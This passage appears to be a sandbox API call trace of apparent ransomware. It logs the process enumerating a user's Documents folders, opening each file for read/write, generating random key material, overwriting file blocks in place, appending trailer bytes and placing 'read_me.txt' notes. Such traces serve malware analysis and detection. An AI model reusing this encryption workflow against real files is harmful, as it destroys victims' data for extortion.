lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c4 [0074.280] QueueUserWorkItem (Function=0x404e00, Context=0x8c4, Flags=0x0) returned 1 [0074.280] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf09dd360, ftCreationTime.dwHighDateTime=0x1d4c9ac, ftLastAccessTime.dwLowDateTime=0x6b6b9890, ftLastAccessTime.dwHighDateTime=0x1d4ceab, ftLastWriteTime.dwLowDateTime=0x6b6b9890, ftLastWriteTime.dwHighDateTime=0x1d4ceab, nFileSizeHigh=0x0, nFileSizeLow=0x170d9, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="X9nyCC8jAnkwjmE7.docx", cAlternateFileName="X9NYCC~1.DOC")) returned 1 [0074.280] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\X9nyCC8jAnkwjmE7.docx") returned 96 [0074.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\X9nyCC8jAnkwjmE7.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\x9nycc8jankwjme7.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c8 [0074.280] QueueUserWorkItem (Function=0x404e00, Context=0x8c8, Flags=0x0) returned 1 [0074.280] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf09dd360, ftCreationTime.dwHighDateTime=0x1d4c9ac, ftLastAccessTime.dwLowDateTime=0x6b6b9890, ftLastAccessTime.dwHighDateTime=0x1d4ceab, ftLastWriteTime.dwLowDateTime=0x6b6b9890, ftLastWriteTime.dwHighDateTime=0x1d4ceab, nFileSizeHigh=0x0, nFileSizeLow=0x170d9, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="x9nycc8jankwjme7.docx", cAlternateFileName="X9NYCC~1.DOC")) returned 0 [0074.280] FindClose (in: hFindFile=0x2b26f8 | out: hFindFile=0x2b26f8) returned 1 [0074.280] wnsprintfW (in: pszDest=0x8b70030, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\read_me.txt") returned 86 [0074.280] GetProcessHeap () returned 0x280000 [0074.280] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b70030 | out: hHeap=0x280000) returned 1 [0074.280] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 48 [0074.280] GetProcessHeap () returned 0x280000 [0074.280] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0074.280] GetProcessHeap () returned 0x280000 [0074.280] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0074.280] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\*") returned 81 [0074.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7505d5a0, ftCreationTime.dwHighDateTime=0x1d4ce4c, ftLastAccessTime.dwLowDateTime=0x16ae7050, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ae7050, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.280] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\.") returned 81 [0074.280] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7505d5a0, ftCreationTime.dwHighDateTime=0x1d4ce4c, ftLastAccessTime.dwLowDateTime=0x16ae7050, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ae7050, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.281] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\..") returned 82 [0074.281] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x752980b0, ftCreationTime.dwHighDateTime=0x1d4d322, ftLastAccessTime.dwLowDateTime=0x7b64b8f0, ftLastAccessTime.dwHighDateTime=0x1d4d17e, ftLastWriteTime.dwLowDateTime=0x7b64b8f0, ftLastWriteTime.dwHighDateTime=0x1d4d17e, nFileSizeHigh=0x0, nFileSizeLow=0x13f47, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="gfyw2.pps", cAlternateFileName="")) returned 1 [0074.281] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\gfyw2.pps") returned 89 [0074.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\gfyw2.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\pzji\\gfyw2.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8cc [0074.281] QueueUserWorkItem (Function=0x404e00, Context=0x8cc, Flags=0x0) returned 1 [0074.281] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba8138d0, ftCreationTime.dwHighDateTime=0x1d4c9ed, ftLastAccessTime.dwLowDateTime=0xaaf3b050, ftLastAccessTime.dwHighDateTime=0x1d4d082, ftLastWriteTime.dwLowDateTime=0xaaf3b050, ftLastWriteTime.dwHighDateTime=0x1d4d082, nFileSizeHigh=0x0, nFileSizeLow=0x17c75, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="HCbTAOuIFyyj.pdf", cAlternateFileName="HCBTAO~1.PDF")) returned 1 [0074.281] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\HCbTAOuIFyyj.pdf") returned 96 [0074.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\HCbTAOuIFyyj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\pzji\\hcbtaouifyyj.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d0 [0074.281] QueueUserWorkItem (Function=0x404e00, Context=0x8d0, Flags=0x0) returned 1 [0074.281] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4a99070, ftCreationTime.dwHighDateTime=0x1d4d398, ftLastAccessTime.dwLowDateTime=0xd3ddfb10, ftLastAccessTime.dwHighDateTime=0x1d4c9de, ftLastWriteTime.dwLowDateTime=0xd3ddfb10, ftLastWriteTime.dwHighDateTime=0x1d4c9de, nFileSizeHigh=0x0, nFileSizeLow=0x13835, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="iyRphKrJJTQme.ppt", cAlternateFileName="IYRPHK~1.PPT")) returned 1 [0074.281] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\iyRphKrJJTQme.ppt") returned 97 [0074.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\iyRphKrJJTQme.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\pzji\\iyrphkrjjtqme.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d4 [0074.281] QueueUserWorkItem (Function=0x404e00, Context=0x8d4, Flags=0x0) returned 1 [0074.281] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x189d4d10, ftCreationTime.dwHighDateTime=0x1d4c8a8, ftLastAccessTime.dwLowDateTime=0xe4a80300, ftLastAccessTime.dwHighDateTime=0x1d4d172, ftLastWriteTime.dwLowDateTime=0xe4a80300, ftLastWriteTime.dwHighDateTime=0x1d4d172, nFileSizeHigh=0x0, nFileSizeLow=0x161b7, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="mQ9GrY.pptx", cAlternateFileName="MQ9GRY~1.PPT")) returned 1 [0074.281] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\mQ9GrY.pptx") returned 91 [0074.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\mQ9GrY.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\pzji\\mq9gry.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d8 [0074.281] QueueUserWorkItem (Function=0x404e00, Context=0x8d8, Flags=0x0) returned 1 [0074.281] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ae7050, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16ae7050, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.281] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\read_me.txt") returned 91 [0074.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU\\pzjI\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\emjzu37kn6ou\\pzji\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8dc [0074.282] SetFilePointerEx (in: hFile=0x76c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.282] ReadFile (in: hFile=0x76c, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.282] SetFilePointerEx (in: hFile=0x76c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.282] GetProcessHeap () returned 0x280000 [0074.282] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0074.282] GetProcessHeap () returned 0x280000 [0074.282] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0074.282] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0074.282] GetProcessHeap () returned 0x280000 [0074.282] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc4668 [0074.282] ReadFile (in: hFile=0x76c, lpBuffer=0x7dc4668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc4668*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0074.348] SetFilePointerEx (in: hFile=0x76c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.348] WriteFile (in: hFile=0x76c, lpBuffer=0x7dc4668*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc4668*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.348] GetProcessHeap () returned 0x280000 [0074.348] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.349] GetProcessHeap () returned 0x280000 [0074.349] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0074.350] GetProcessHeap () returned 0x280000 [0074.350] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0074.350] GetProcessHeap () returned 0x280000 [0074.351] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.351] GetProcessHeap () returned 0x280000 [0074.351] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.352] GetProcessHeap () returned 0x280000 [0074.352] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0074.352] GetProcessHeap () returned 0x280000 [0074.353] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0074.353] GetProcessHeap () returned 0x280000 [0074.353] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.353] GetProcessHeap () returned 0x280000 [0074.353] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0074.353] SetFilePointerEx (in: hFile=0x76c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.353] WriteFile (in: hFile=0x76c, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.367] WriteFile (in: hFile=0x76c, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.367] GetProcessHeap () returned 